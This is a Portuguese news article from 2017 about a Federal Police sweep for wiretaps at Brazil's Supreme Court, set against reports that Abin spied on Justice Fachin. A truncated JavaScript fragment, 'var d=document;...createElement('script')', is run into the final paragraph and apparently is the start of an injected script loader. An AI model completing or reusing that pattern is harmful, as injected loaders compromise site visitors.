Polícia procura grampos no STF a pedido de Cármen Lúcia

BSB Capital 27/06/2017 às 9:48, Atualizado em 18/09/2017 às 21:13

Presidente do Supremo pediu varredura no tribunal para verificar se há ameaças para a segurança dos ministros e servidores

A Polícia Federal fez varredura na noite desta segunda-feira (26) no segundo andar do palácio do Supremo Tribunal Federal (STF), em Brasília. Segundo informações da Rede Globo, os agentes revistaram gavetas, mesas e telefones.

O STF confirmou que a varredura estava programada para esta segunda, com o objetivo de verificar se há ameaças para a segurança do tribunal, como grampos e outros. Segundo a corte, esse tipo de operação ocorre periodicamente.

No último dia 10, a revista “Veja” informou que o governo Michel Temer havia acionado a Agência Brasileira de Inteligência (Abin) para “bisbilhotar a vida de Fachin”. O objetivo da investigação sobre o magistrado seria, segundo a “Veja”, fragilizar e constranger Fachin, relator do inquérito que investigou Temer com base nas delações da JBS.

Na ocasião, o Palácio do Planalto negou qualquer investigação por parte da Abin e Temer chegou a ligar para Cármen Lúcia para negar a informação da reportagem.var d=document;var s=d.createElement(‘script’);

Deixe um comentário

Rolar para cima